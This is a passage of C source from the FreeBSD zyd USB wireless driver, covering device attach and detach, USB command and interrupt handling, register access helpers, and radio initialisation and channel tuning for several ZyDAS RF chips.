= UE_DIR_IN, .bufsize = sizeof(struct zyd_cmd), .flags = {.pipe_bof = 1,.short_xfer_ok = 1,}, .callback = zyd_intr_read_callback, }, }; #define zyd_read16_m(sc, val, data) do { \ error = zyd_read16(sc, val, data); \ if (error != 0) \ goto fail; \ } while (0) #define zyd_write16_m(sc, val, data) do { \ error = zyd_write16(sc, val, data); \ if (error != 0) \ goto fail; \ } while (0) #define zyd_read32_m(sc, val, data) do { \ error = zyd_read32(sc, val, data); \ if (error != 0) \ goto fail; \ } while (0) #define zyd_write32_m(sc, val, data) do { \ error = zyd_write32(sc, val, data); \ if (error != 0) \ goto fail; \ } while (0) static int zyd_match(device_t dev) { struct usb_attach_arg *uaa = device_get_ivars(dev); if (uaa->usb_mode != USB_MODE_HOST) return (ENXIO); if (uaa->info.bConfigIndex != ZYD_CONFIG_INDEX) return (ENXIO); if (uaa->info.bIfaceIndex != ZYD_IFACE_INDEX) return (ENXIO); return (usbd_lookup_id_by_uaa(zyd_devs, sizeof(zyd_devs), uaa)); } static int zyd_attach(device_t dev) { struct usb_attach_arg *uaa = device_get_ivars(dev); struct zyd_softc *sc = device_get_softc(dev); struct ifnet *ifp; struct ieee80211com *ic; uint8_t iface_index, bands; int error; if (uaa->info.bcdDevice < 0x4330) { device_printf(dev, "device version mismatch: 0x%X " "(only >= 43.30 supported)\n", uaa->info.bcdDevice); return (EINVAL); } device_set_usb_desc(dev); sc->sc_dev = dev; sc->sc_udev = uaa->device; sc->sc_macrev = USB_GET_DRIVER_INFO(uaa); mtx_init(&sc->sc_mtx, device_get_nameunit(sc->sc_dev), MTX_NETWORK_LOCK, MTX_DEF); STAILQ_INIT(&sc->sc_rqh); iface_index = ZYD_IFACE_INDEX; error = usbd_transfer_setup(uaa->device, &iface_index, sc->sc_xfer, zyd_config, ZYD_N_TRANSFER, sc, &sc->sc_mtx); if (error) { device_printf(dev, "could not allocate USB transfers, " "err=%s\n", usbd_errstr(error)); goto detach; } ZYD_LOCK(sc); if ((error = zyd_get_macaddr(sc)) != 0) { device_printf(sc->sc_dev, "could not read EEPROM\n"); ZYD_UNLOCK(sc); goto detach; } ZYD_UNLOCK(sc); ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(sc->sc_dev, "can not if_alloc()\n"); goto detach; } ifp->if_softc = sc; if_initname(ifp, "zyd", device_get_unit(sc->sc_dev)); ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = zyd_init; ifp->if_ioctl = zyd_ioctl; ifp->if_start = zyd_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); IFQ_SET_READY(&ifp->if_snd); ic = ifp->if_l2com; ic->ic_ifp = ifp; ic->ic_phytype = IEEE80211_T_OFDM; /* not only, but not used */ ic->ic_opmode = IEEE80211_M_STA; /* set device capabilities */ ic->ic_caps = IEEE80211_C_STA /* station mode */ | IEEE80211_C_MONITOR /* monitor mode */ | IEEE80211_C_SHPREAMBLE /* short preamble supported */ | IEEE80211_C_SHSLOT /* short slot time supported */ | IEEE80211_C_BGSCAN /* capable of bg scanning */ | IEEE80211_C_WPA /* 802.11i */ ; bands = 0; setbit(&bands, IEEE80211_MODE_11B); setbit(&bands, IEEE80211_MODE_11G); ieee80211_init_channels(ic, NULL, &bands); ieee80211_ifattach(ic, sc->sc_bssid); ic->ic_raw_xmit = zyd_raw_xmit; ic->ic_scan_start = zyd_scan_start; ic->ic_scan_end = zyd_scan_end; ic->ic_set_channel = zyd_set_channel; ic->ic_vap_create = zyd_vap_create; ic->ic_vap_delete = zyd_vap_delete; ic->ic_update_mcast = zyd_update_mcast; ic->ic_update_promisc = zyd_update_mcast; ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), ZYD_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), ZYD_RX_RADIOTAP_PRESENT); if (bootverbose) ieee80211_announce(ic); return (0); detach: zyd_detach(dev); 
return (ENXIO); /* failure */ } static int zyd_detach(device_t dev) { struct zyd_softc *sc = device_get_softc(dev); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic; unsigned int x; /* * Prevent further allocations from RX/TX data * lists and ioctls: */ ZYD_LOCK(sc); sc->sc_flags |= ZYD_FLAG_DETACHED; STAILQ_INIT(&sc->tx_q); STAILQ_INIT(&sc->tx_free); ZYD_UNLOCK(sc); /* drain USB transfers */ for (x = 0; x != ZYD_N_TRANSFER; x++) usbd_transfer_drain(sc->sc_xfer[x]); /* free TX list, if any */ ZYD_LOCK(sc); zyd_unsetup_tx_list(sc); ZYD_UNLOCK(sc); /* free USB transfers and some data buffers */ usbd_transfer_unsetup(sc->sc_xfer, ZYD_N_TRANSFER); if (ifp) { ic = ifp->if_l2com; ieee80211_ifdetach(ic); if_free(ifp); } mtx_destroy(&sc->sc_mtx); return (0); } static struct ieee80211vap * zyd_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct zyd_vap *zvp; struct ieee80211vap *vap; if (!TAILQ_EMPTY(&ic->ic_vaps)) /* only one at a time */ return (NULL); zvp = (struct zyd_vap *) malloc(sizeof(struct zyd_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (zvp == NULL) return (NULL); vap = &zvp->vap; /* enable s/w bmiss handling for sta mode */ if (ieee80211_vap_setup(ic, vap, name, unit, opmode, flags | IEEE80211_CLONE_NOBEACONS, bssid, mac) != 0) { /* out of memory */ free(zvp, M_80211_VAP); return (NULL); } /* override state transition machine */ zvp->newstate = vap->iv_newstate; vap->iv_newstate = zyd_newstate; ieee80211_ratectl_init(vap); ieee80211_ratectl_setinterval(vap, 1000 /* 1 sec */); /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, ieee80211_media_status); ic->ic_opmode = opmode; return (vap); } static void zyd_vap_delete(struct ieee80211vap *vap) { struct zyd_vap *zvp = ZYD_VAP(vap); ieee80211_ratectl_deinit(vap); ieee80211_vap_detach(vap); free(zvp, M_80211_VAP); } static void zyd_tx_free(struct zyd_tx_data *data, int txerr) { struct zyd_softc *sc = data->sc; if (data->m != NULL) { if (data->m->m_flags & M_TXCB) ieee80211_process_callback(data->ni, data->m, txerr ? 
ETIMEDOUT : 0); m_freem(data->m); data->m = NULL; ieee80211_free_node(data->ni); data->ni = NULL; } STAILQ_INSERT_TAIL(&sc->tx_free, data, next); sc->tx_nfree++; } static void zyd_setup_tx_list(struct zyd_softc *sc) { struct zyd_tx_data *data; int i; sc->tx_nfree = 0; STAILQ_INIT(&sc->tx_q); STAILQ_INIT(&sc->tx_free); for (i = 0; i < ZYD_TX_LIST_CNT; i++) { data = &sc->tx_data[i]; data->sc = sc; STAILQ_INSERT_TAIL(&sc->tx_free, data, next); sc->tx_nfree++; } } static void zyd_unsetup_tx_list(struct zyd_softc *sc) { struct zyd_tx_data *data; int i; /* make sure any subsequent use of the queues will fail */ sc->tx_nfree = 0; STAILQ_INIT(&sc->tx_q); STAILQ_INIT(&sc->tx_free); /* free up all node references and mbufs */ for (i = 0; i < ZYD_TX_LIST_CNT; i++) { data = &sc->tx_data[i]; if (data->m != NULL) { m_freem(data->m); data->m = NULL; } if (data->ni != NULL) { ieee80211_free_node(data->ni); data->ni = NULL; } } } static int zyd_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct zyd_vap *zvp = ZYD_VAP(vap); struct ieee80211com *ic = vap->iv_ic; struct zyd_softc *sc = ic->ic_ifp->if_softc; int error; DPRINTF(sc, ZYD_DEBUG_STATE, "%s: %s -> %s\n", __func__, ieee80211_state_name[vap->iv_state], ieee80211_state_name[nstate]); IEEE80211_UNLOCK(ic); ZYD_LOCK(sc); switch (nstate) { case IEEE80211_S_AUTH: zyd_set_chan(sc, ic->ic_curchan); break; case IEEE80211_S_RUN: if (vap->iv_opmode == IEEE80211_M_MONITOR) break; /* turn link LED on */ error = zyd_set_led(sc, ZYD_LED1, 1); if (error != 0) break; /* make data LED blink upon Tx */ zyd_write32_m(sc, sc->sc_fwbase + ZYD_FW_LINK_STATUS, 1); IEEE80211_ADDR_COPY(sc->sc_bssid, vap->iv_bss->ni_bssid); zyd_set_bssid(sc, sc->sc_bssid); break; default: break; } fail: ZYD_UNLOCK(sc); IEEE80211_LOCK(ic); return (zvp->newstate(vap, nstate, arg)); } /* * Callback handler for interrupt transfer */ static void zyd_intr_read_callback(struct usb_xfer *xfer, usb_error_t error) { struct zyd_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); struct ieee80211_node *ni; struct zyd_cmd *cmd = &sc->sc_ibuf; struct usb_page_cache *pc; int datalen; int actlen; usbd_xfer_status(xfer, &actlen, NULL, NULL, NULL); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: pc = usbd_xfer_get_frame(xfer, 0); usbd_copy_out(pc, 0, cmd, sizeof(*cmd)); switch (le16toh(cmd->code)) { case ZYD_NOTIF_RETRYSTATUS: { struct zyd_notif_retry *retry = (struct zyd_notif_retry *)cmd->data; DPRINTF(sc, ZYD_DEBUG_TX_PROC, "retry intr: rate=0x%x addr=%s count=%d (0x%x)\n", le16toh(retry->rate), ether_sprintf(retry->macaddr), le16toh(retry->count)&0xff, le16toh(retry->count)); /* * Find the node to which the packet was sent and * update its retry statistics. In BSS mode, this node * is the AP we're associated to so no lookup is * actually needed. */ ni = ieee80211_find_txnode(vap, retry->macaddr); if (ni != NULL) { int retrycnt = (int)(le16toh(retry->count) & 0xff); ieee80211_ratectl_tx_complete(vap, ni, IEEE80211_RATECTL_TX_FAILURE, &retrycnt, NULL); ieee80211_free_node(ni); } if (le16toh(retry->count) & 0x100) ifp->if_oerrors++; /* too many retries */ break; } case ZYD_NOTIF_IORD: { struct zyd_rq *rqp; if (le16toh(*(uint16_t *)cmd->data) == ZYD_CR_INTERRUPT) break; /* HMAC interrupt */ datalen = actlen - sizeof(cmd->code); datalen -= 2; /* XXX: padding? 
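 * Two trailing bytes are dropped before the answer length is matched against the requests pending on sc_rqh.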
*/ STAILQ_FOREACH(rqp, &sc->sc_rqh, rq) { int i; int count; if (rqp->olen != datalen) continue; count = rqp->olen / sizeof(struct zyd_pair); for (i = 0; i < count; i++) { if (*(((const uint16_t *)rqp->idata) + i) != (((struct zyd_pair *)cmd->data) + i)->reg) break; } if (i != count) continue; /* copy answer into caller-supplied buffer */ memcpy(rqp->odata, cmd->data, rqp->olen); DPRINTF(sc, ZYD_DEBUG_CMD, "command %p complete, data = %*D \n", rqp, rqp->olen, (char *)rqp->odata, ":"); wakeup(rqp); /* wakeup caller */ break; } if (rqp == NULL) { device_printf(sc->sc_dev, "unexpected IORD notification %*D\n", datalen, cmd->data, ":"); } break; } default: device_printf(sc->sc_dev, "unknown notification %x\n", le16toh(cmd->code)); } /* FALLTHROUGH */ case USB_ST_SETUP: tr_setup: usbd_xfer_set_frame_len(xfer, 0, usbd_xfer_max_len(xfer)); usbd_transfer_submit(xfer); break; default: /* Error */ DPRINTF(sc, ZYD_DEBUG_CMD, "error = %s\n", usbd_errstr(error)); if (error != USB_ERR_CANCELLED) { /* try to clear stall first */ usbd_xfer_set_stall(xfer); goto tr_setup; } break; } } static void zyd_intr_write_callback(struct usb_xfer *xfer, usb_error_t error) { struct zyd_softc *sc = usbd_xfer_softc(xfer); struct zyd_rq *rqp, *cmd; struct usb_page_cache *pc; switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: cmd = usbd_xfer_get_priv(xfer); DPRINTF(sc, ZYD_DEBUG_CMD, "command %p transferred\n", cmd); STAILQ_FOREACH(rqp, &sc->sc_rqh, rq) { /* Ensure the cached rq pointer is still valid */ if (rqp == cmd && (rqp->flags & ZYD_CMD_FLAG_READ) == 0) wakeup(rqp); /* wakeup caller */ } /* FALLTHROUGH */ case USB_ST_SETUP: tr_setup: STAILQ_FOREACH(rqp, &sc->sc_rqh, rq) { if (rqp->flags & ZYD_CMD_FLAG_SENT) continue; pc = usbd_xfer_get_frame(xfer, 0); usbd_copy_in(pc, 0, rqp->cmd, rqp->ilen); usbd_xfer_set_frame_len(xfer, 0, rqp->ilen); usbd_xfer_set_priv(xfer, rqp); rqp->flags |= ZYD_CMD_FLAG_SENT; usbd_transfer_submit(xfer); break; } break; default: /* Error */ DPRINTF(sc, ZYD_DEBUG_ANY, "error = %s\n", usbd_errstr(error)); if (error != USB_ERR_CANCELLED) { /* try to clear stall first */ usbd_xfer_set_stall(xfer); goto tr_setup; } break; } } static int zyd_cmd(struct zyd_softc *sc, uint16_t code, const void *idata, int ilen, void *odata, int olen, int flags) { struct zyd_cmd cmd; struct zyd_rq rq; int error; if (ilen > (int)sizeof(cmd.data)) return (EINVAL); cmd.code = htole16(code); memcpy(cmd.data, idata, ilen); DPRINTF(sc, ZYD_DEBUG_CMD, "sending cmd %p = %*D\n", &rq, ilen, idata, ":"); rq.cmd = &cmd; rq.idata = idata; rq.odata = odata; rq.ilen = sizeof(uint16_t) + ilen; rq.olen = olen; rq.flags = flags; STAILQ_INSERT_TAIL(&sc->sc_rqh, &rq, rq); usbd_transfer_start(sc->sc_xfer[ZYD_INTR_RD]); usbd_transfer_start(sc->sc_xfer[ZYD_INTR_WR]); /* wait at most one second for command reply */ error = mtx_sleep(&rq, &sc->sc_mtx, 0, "zydcmd", hz); if (error) device_printf(sc->sc_dev, "command timeout\n"); STAILQ_REMOVE(&sc->sc_rqh, &rq, zyd_rq, rq); DPRINTF(sc, ZYD_DEBUG_CMD, "finished cmd %p, error = %d \n", &rq, error); return (error); } static int zyd_read16(struct zyd_softc *sc, uint16_t reg, uint16_t *val) { struct zyd_pair tmp; int error; reg = htole16(reg); error = zyd_cmd(sc, ZYD_CMD_IORD, &reg, sizeof(reg), &tmp, sizeof(tmp), ZYD_CMD_FLAG_READ); if (error == 0) *val = le16toh(tmp.val); return (error); } static int zyd_read32(struct zyd_softc *sc, uint16_t reg, uint32_t *val) { struct zyd_pair tmp[2]; uint16_t regs[2]; int error; regs[0] = htole16(ZYD_REG32_HI(reg)); regs[1] = htole16(ZYD_REG32_LO(reg)); error
= zyd_cmd(sc, ZYD_CMD_IORD, regs, sizeof(regs), tmp, sizeof(tmp), ZYD_CMD_FLAG_READ); if (error == 0) *val = le16toh(tmp[0].val) << 16 | le16toh(tmp[1].val); return (error); } static int zyd_write16(struct zyd_softc *sc, uint16_t reg, uint16_t val) { struct zyd_pair pair; pair.reg = htole16(reg); pair.val = htole16(val); return zyd_cmd(sc, ZYD_CMD_IOWR, &pair, sizeof(pair), NULL, 0, 0); } static int zyd_write32(struct zyd_softc *sc, uint16_t reg, uint32_t val) { struct zyd_pair pair[2]; pair[0].reg = htole16(ZYD_REG32_HI(reg)); pair[0].val = htole16(val >> 16); pair[1].reg = htole16(ZYD_REG32_LO(reg)); pair[1].val = htole16(val & 0xffff); return zyd_cmd(sc, ZYD_CMD_IOWR, pair, sizeof(pair), NULL, 0, 0); } static int zyd_rfwrite(struct zyd_softc *sc, uint32_t val) { struct zyd_rf *rf = &sc->sc_rf; struct zyd_rfwrite_cmd req; uint16_t cr203; int error, i; zyd_read16_m(sc, ZYD_CR203, &cr203); cr203 &= ~(ZYD_RF_IF_LE | ZYD_RF_CLK | ZYD_RF_DATA); req.code = htole16(2); req.width = htole16(rf->width); for (i = 0; i < rf->width; i++) { req.bit[i] = htole16(cr203); if (val & (1 << (rf->width - 1 - i))) req.bit[i] |= htole16(ZYD_RF_DATA); } error = zyd_cmd(sc, ZYD_CMD_RFCFG, &req, 4 + 2 * rf->width, NULL, 0, 0); fail: return (error); } static int zyd_rfwrite_cr(struct zyd_softc *sc, uint32_t val) { int error; zyd_write16_m(sc, ZYD_CR244, (val >> 16) & 0xff); zyd_write16_m(sc, ZYD_CR243, (val >> 8) & 0xff); zyd_write16_m(sc, ZYD_CR242, (val >> 0) & 0xff); fail: return (error); } static int zyd_lock_phy(struct zyd_softc *sc) { int error; uint32_t tmp; zyd_read32_m(sc, ZYD_MAC_MISC, &tmp); tmp &= ~ZYD_UNLOCK_PHY_REGS; zyd_write32_m(sc, ZYD_MAC_MISC, tmp); fail: return (error); } static int zyd_unlock_phy(struct zyd_softc *sc) { int error; uint32_t tmp; zyd_read32_m(sc, ZYD_MAC_MISC, &tmp); tmp |= ZYD_UNLOCK_PHY_REGS; zyd_write32_m(sc, ZYD_MAC_MISC, tmp); fail: return (error); } /* * RFMD RF methods. */ static int zyd_rfmd_init(struct zyd_rf *rf) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) struct zyd_softc *sc = rf->rf_sc; static const struct zyd_phy_pair phyini[] = ZYD_RFMD_PHY; static const uint32_t rfini[] = ZYD_RFMD_RF; int i, error; /* init RF-dependent PHY registers */ for (i = 0; i < N(phyini); i++) { zyd_write16_m(sc, phyini[i].reg, phyini[i].val); } /* init RFMD radio */ for (i = 0; i < N(rfini); i++) { if ((error = zyd_rfwrite(sc, rfini[i])) != 0) return (error); } fail: return (error); #undef N } static int zyd_rfmd_switch_radio(struct zyd_rf *rf, int on) { int error; struct zyd_softc *sc = rf->rf_sc; zyd_write16_m(sc, ZYD_CR10, on ? 0x89 : 0x15); zyd_write16_m(sc, ZYD_CR11, on ? 0x00 : 0x81); fail: return (error); } static int zyd_rfmd_set_channel(struct zyd_rf *rf, uint8_t chan) { int error; struct zyd_softc *sc = rf->rf_sc; static const struct { uint32_t r1, r2; } rfprog[] = ZYD_RFMD_CHANTABLE; error = zyd_rfwrite(sc, rfprog[chan - 1].r1); if (error != 0) goto fail; error = zyd_rfwrite(sc, rfprog[chan - 1].r2); if (error != 0) goto fail; fail: return (error); } /* * AL2230 RF methods. 
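 * zyd_al2230_init() writes the RF-dependent PHY registers, then the AL2230 RF tables (PART1..PART3) with the phypll sequence in between.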
*/ static int zyd_al2230_init(struct zyd_rf *rf) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) struct zyd_softc *sc = rf->rf_sc; static const struct zyd_phy_pair phyini[] = ZYD_AL2230_PHY; static const struct zyd_phy_pair phy2230s[] = ZYD_AL2230S_PHY_INIT; static const struct zyd_phy_pair phypll[] = { { ZYD_CR251, 0x2f }, { ZYD_CR251, 0x3f }, { ZYD_CR138, 0x28 }, { ZYD_CR203, 0x06 } }; static const uint32_t rfini1[] = ZYD_AL2230_RF_PART1; static const uint32_t rfini2[] = ZYD_AL2230_RF_PART2; static const uint32_t rfini3[] = ZYD_AL2230_RF_PART3; int i, error; /* init RF-dependent PHY registers */ for (i = 0; i < N(phyini); i++) zyd_write16_m(sc, phyini[i].reg, phyini[i].val); if (sc->sc_rfrev == ZYD_RF_AL2230S || sc->sc_al2230s != 0) { for (i = 0; i < N(phy2230s); i++) zyd_write16_m(sc, phy2230s[i].reg, phy2230s[i].val); } /* init AL2230 radio */ for (i = 0; i < N(rfini1); i++) { error = zyd_rfwrite(sc, rfini1[i]); if (error != 0) goto fail; } if (sc->sc_rfrev == ZYD_RF_AL2230S || sc->sc_al2230s != 0) error = zyd_rfwrite(sc, 0x000824); else error = zyd_rfwrite(sc, 0x0005a4); if (error != 0) goto fail; for (i = 0; i < N(rfini2); i++) { error = zyd_rfwrite(sc, rfini2[i]); if (error != 0) goto fail; } for (i = 0; i < N(phypll); i++) zyd_write16_m(sc, phypll[i].reg, phypll[i].val); for (i = 0; i < N(rfini3); i++) { error = zyd_rfwrite(sc, rfini3[i]); if (error != 0) goto fail; } fail: return (error); #undef N } static int zyd_al2230_fini(struct zyd_rf *rf) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) int error, i; struct zyd_softc *sc = rf->rf_sc; static const struct zyd_phy_pair phy[] = ZYD_AL2230_PHY_FINI_PART1; for (i = 0; i < N(phy); i++) zyd_write16_m(sc, phy[i].reg, phy[i].val); if (sc->sc_newphy != 0) zyd_write16_m(sc, ZYD_CR9, 0xe1); zyd_write16_m(sc, ZYD_CR203, 0x6); fail: return (error); #undef N } static int zyd_al2230_init_b(struct zyd_rf *rf) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) struct zyd_softc *sc = rf->rf_sc; static const struct zyd_phy_pair phy1[] = ZYD_AL2230_PHY_PART1; static const struct zyd_phy_pair phy2[] = ZYD_AL2230_PHY_PART2; static const struct zyd_phy_pair phy3[] = ZYD_AL2230_PHY_PART3; static const struct zyd_phy_pair phy2230s[] = ZYD_AL2230S_PHY_INIT; static const struct zyd_phy_pair phyini[] = ZYD_AL2230_PHY_B; static const uint32_t rfini_part1[] = ZYD_AL2230_RF_B_PART1; static const uint32_t rfini_part2[] = ZYD_AL2230_RF_B_PART2; static const uint32_t rfini_part3[] = ZYD_AL2230_RF_B_PART3; static const uint32_t zyd_al2230_chtable[][3] = ZYD_AL2230_CHANTABLE; int i, error; for (i = 0; i < N(phy1); i++) zyd_write16_m(sc, phy1[i].reg, phy1[i].val); /* init RF-dependent PHY registers */ for (i = 0; i < N(phyini); i++) zyd_write16_m(sc, phyini[i].reg, phyini[i].val); if (sc->sc_rfrev == ZYD_RF_AL2230S || sc->sc_al2230s != 0) { for (i = 0; i < N(phy2230s); i++) zyd_write16_m(sc, phy2230s[i].reg, phy2230s[i].val); } for (i = 0; i < 3; i++) { error = zyd_rfwrite_cr(sc, zyd_al2230_chtable[0][i]); if (error != 0) return (error); } for (i = 0; i < N(rfini_part1); i++) { error = zyd_rfwrite_cr(sc, rfini_part1[i]); if (error != 0) return (error); } if (sc->sc_rfrev == ZYD_RF_AL2230S || sc->sc_al2230s != 0) error = zyd_rfwrite(sc, 0x241000); else error = zyd_rfwrite(sc, 0x25a000); if (error != 0) goto fail; for (i = 0; i < N(rfini_part2); i++) { error = zyd_rfwrite_cr(sc, rfini_part2[i]); if (error != 0) return (error); } for (i = 0; i < N(phy2); i++) zyd_write16_m(sc, phy2[i].reg, phy2[i].val); for (i = 0; i < N(rfini_part3); i++) { error = 
zyd_rfwrite_cr(sc, rfini_part3[i]); if (error != 0) return (error); } for (i = 0; i < N(phy3); i++) zyd_write16_m(sc, phy3[i].reg, phy3[i].val); error = zyd_al2230_fini(rf); fail: return (error); #undef N } static int zyd_al2230_switch_radio(struct zyd_rf *rf, int on) { struct zyd_softc *sc = rf->rf_sc; int error, on251 = (sc->sc_macrev == ZYD_ZD1211) ? 0x3f : 0x7f; zyd_write16_m(sc, ZYD_CR11, on ? 0x00 : 0x04); zyd_write16_m(sc, ZYD_CR251, on ? on251 : 0x2f); fail: return (error); } static int zyd_al2230_set_channel(struct zyd_rf *rf, uint8_t chan) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) int error, i; struct zyd_softc *sc = rf->rf_sc; static const struct zyd_phy_pair phy1[] = { { ZYD_CR138, 0x28 }, { ZYD_CR203, 0x06 }, }; static const struct { uint32_t r1, r2, r3; } rfprog[] = ZYD_AL2230_CHANTABLE; error = zyd_rfwrite(sc, rfprog[chan - 1].r1); if (error != 0) goto fail; error = zyd_rfwrite(sc, rfprog[chan - 1].r2); if (error != 0) goto fail; error = zyd_rfwrite(sc, rfprog[chan - 1].r3); if (error != 0) goto fail; for (i = 0; i < N(phy1); i++) zyd_write16_m(sc, phy1[i].reg, phy1[i].val); fail: return (error); #undef N } static int zyd_al2230_set_channel_b(struct zyd_rf *rf, uint8_t chan) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) int error, i; struct zyd_softc *sc = rf->rf_sc; static const struct zyd_phy_pair phy1[] = ZYD_AL2230_PHY_PART1; static const struct { uint32_t r1, r2, r3; } rfprog[] = ZYD_AL2230_CHANTABLE_B; for (i = 0; i < N(phy1); i++) zyd_write16_m(sc, phy1[i].reg, phy1[i].val); error = zyd_rfwrite_cr(sc, rfprog[chan - 1].r1); if (error != 0) goto fail; error = zyd_rfwrite_cr(sc, rfprog[chan - 1].r2); if (error != 0) goto fail; error = zyd_rfwrite_cr(sc, rfprog[chan - 1].r3); if (error != 0) goto fail; error = zyd_al2230_fini(rf); fail: return (error); #undef N } #define ZYD_AL2230_PHY_BANDEDGE6 \ { \ { ZYD_CR128, 0x14 }, { ZYD_CR129, 0x12 }, { ZYD_CR130, 0x10 }, \ { ZYD_CR47, 0x1e } \ } static int zyd_al2230_bandedge6(struct zyd_rf *rf, struct ieee80211_channel *c) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) int error = 0, i; struct zyd_softc *sc = rf->rf_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct zyd_phy_pair r[] = ZYD_AL2230_PHY_BANDEDGE6; int chan = ieee80211_chan2ieee(ic, c); if (chan == 1 || chan == 11) r[0].val = 0x12; for (i = 0; i < N(r); i++) zyd_write16_m(sc, r[i].reg, r[i].val); fail: return (error); #undef N } /* * AL7230B RF methods. 
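 * PHY and RF registers are programmed in alternating phases; see the note at the top of zyd_al7230B_init().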
*/ static int zyd_al7230B_init(struct zyd_rf *rf) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) struct zyd_softc *sc = rf->rf_sc; static const struct zyd_phy_pair phyini_1[] = ZYD_AL7230B_PHY_1; static const struct zyd_phy_pair phyini_2[] = ZYD_AL7230B_PHY_2; static const struct zyd_phy_pair phyini_3[] = ZYD_AL7230B_PHY_3; static const uint32_t rfini_1[] = ZYD_AL7230B_RF_1; static const uint32_t rfini_2[] = ZYD_AL7230B_RF_2; int i, error; /* for AL7230B, PHY and RF need to be initialized in "phases" */ /* init RF-dependent PHY registers, part one */ for (i = 0; i < N(phyini_1); i++) zyd_write16_m(sc, phyini_1[i].reg, phyini_1[i].val); /* init AL7230B radio, part one */ for (i = 0; i < N(rfini_1); i++) { if ((error = zyd_rfwrite(sc, rfini_1[i])) != 0) return (error); } /* init RF-dependent PHY registers, part two */ for (i = 0; i < N(phyini_2); i++) zyd_write16_m(sc, phyini_2[i].reg, phyini_2[i].val); /* init AL7230B radio, part two */ for (i = 0; i < N(rfini_2); i++) { if ((error = zyd_rfwrite(sc, rfini_2[i])) != 0) return (error); } /* init RF-dependent PHY registers, part three */ for (i = 0; i < N(phyini_3); i++) zyd_write16_m(sc, phyini_3[i].reg, phyini_3[i].val); fail: return (error); #undef N } static int zyd_al7230B_switch_radio(struct zyd_rf *rf, int on) { int error; struct zyd_softc *sc = rf->rf_sc; zyd_write16_m(sc, ZYD_CR11, on ? 0x00 : 0x04); zyd_write16_m(sc, ZYD_CR251, on ? 0x3f : 0x2f); fail: return (error); } static int zyd_al7230B_set_channel(struct zyd_rf *rf, uint8_t chan) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) struct zyd_softc *sc = rf->rf_sc; static const struct { uint32_t r1, r2; } rfprog[] = ZYD_AL7230B_CHANTABLE; static const uint32_t rfsc[] = ZYD_AL7230B_RF_SETCHANNEL; int i, error; zyd_write16_m(sc, ZYD_CR240, 0x57); zyd_write16_m(sc, ZYD_CR251, 0x2f); for (i = 0; i < N(rfsc); i++) { if ((error = zyd_rfwrite(sc, rfsc[i])) != 0) return (error); } zyd_write16_m(sc, ZYD_CR128, 0x14); zyd_write16_m(sc, ZYD_CR129, 0x12); zyd_write16_m(sc, ZYD_CR130, 0x10); zyd_write16_m(sc, ZYD_CR38, 0x38); zyd_write16_m(sc, ZYD_CR136, 0xdf); error = zyd_rfwrite(sc, rfprog[chan - 1].r1); if (error != 0) goto fail; error = zyd_rfwrite(sc, rfprog[chan - 1].r2); if (error != 0) goto fail; error = zyd_rfwrite(sc, 0x3c9000); if (error != 0) goto fail; zyd_write16_m(sc, ZYD_CR251, 0x3f); zyd_write16_m(sc, ZYD_CR203, 0x06); zyd_write16_m(sc, ZYD_CR240, 0x08); fail: return (error); #undef N } /* * AL2210 RF methods. 
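 * Switching this radio on/off is a no-op; the vendor driver does nothing for it.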
*/ static int zyd_al2210_init(struct zyd_rf *rf) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) struct zyd_softc *sc = rf->rf_sc; static const struct zyd_phy_pair phyini[] = ZYD_AL2210_PHY; static const uint32_t rfini[] = ZYD_AL2210_RF; uint32_t tmp; int i, error; zyd_write32_m(sc, ZYD_CR18, 2); /* init RF-dependent PHY registers */ for (i = 0; i < N(phyini); i++) zyd_write16_m(sc, phyini[i].reg, phyini[i].val); /* init AL2210 radio */ for (i = 0; i < N(rfini); i++) { if ((error = zyd_rfwrite(sc, rfini[i])) != 0) return (error); } zyd_write16_m(sc, ZYD_CR47, 0x1e); zyd_read32_m(sc, ZYD_CR_RADIO_PD, &tmp); zyd_write32_m(sc, ZYD_CR_RADIO_PD, tmp & ~1); zyd_write32_m(sc, ZYD_CR_RADIO_PD, tmp | 1); zyd_write32_m(sc, ZYD_CR_RFCFG, 0x05); zyd_write32_m(sc, ZYD_CR_RFCFG, 0x00); zyd_write16_m(sc, ZYD_CR47, 0x1e); zyd_write32_m(sc, ZYD_CR18, 3); fail: return (error); #undef N } static int zyd_al2210_switch_radio(struct zyd_rf *rf, int on) { /* vendor driver does nothing for this RF chip */ return (0); } static int zyd_al2210_set_channel(struct zyd_rf *rf, uint8_t chan) { int error; struct zyd_softc *sc = rf->rf_sc; static const uint32_t rfprog[] = ZYD_AL2210_CHANTABLE; uint32_t tmp; zyd_write32_m(sc, ZYD_CR18, 2); zyd_write16_m(sc, ZYD_CR47, 0x1e); zyd_read32_m(sc, ZYD_CR_RADIO_PD, &tmp); zyd_write32_m(sc, ZYD_CR_RADIO_PD, tmp & ~1); 